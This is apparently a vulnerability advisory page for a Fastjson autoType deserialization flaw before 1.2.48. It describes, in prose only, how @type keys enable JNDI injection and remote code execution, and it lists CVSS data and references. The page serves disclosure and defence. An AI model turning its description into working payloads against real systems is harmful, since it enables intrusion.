CVE-2025-70974

CVSS 10 CRITICALEPSS 0.6%CWE-829

In short

Fastjson library before version 1.2.48 allows attackers to execute arbitrary code by embedding malicious Java class names in JSON documents. When processing JSON with @type fields, the library instantiates these classes and calls their methods, which can be exploited to inject and execute remote code.

Technical detail

Fastjson's autoType feature deserializes arbitrary Java classes specified via @type keys in JSON input without sufficient validation, enabling JNDI injection attacks. An attacker can craft a JSON payload that triggers instantiation of gadget classes whose constructors or methods execute arbitrary code; this is a deserialization RCE vulnerability that bypasses incomplete fixes from CVE-2017-18349.

Summary generated and translated by AI from the official description.

Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Affected products

Alibaba · Fastjson

Want to know if your infrastructure is exposed to this?

Talk to TrueHacking →

References

https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 https://github.com/alibaba/fastjson/compare/1.2.47...1.2.48 https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger https://www.cnvd.org.cn/flaw/show/CNVD-2019-22238 https://www.freebuf.com/vuls/208339.html https://www.seebug.org/vuldb/ssvid-98020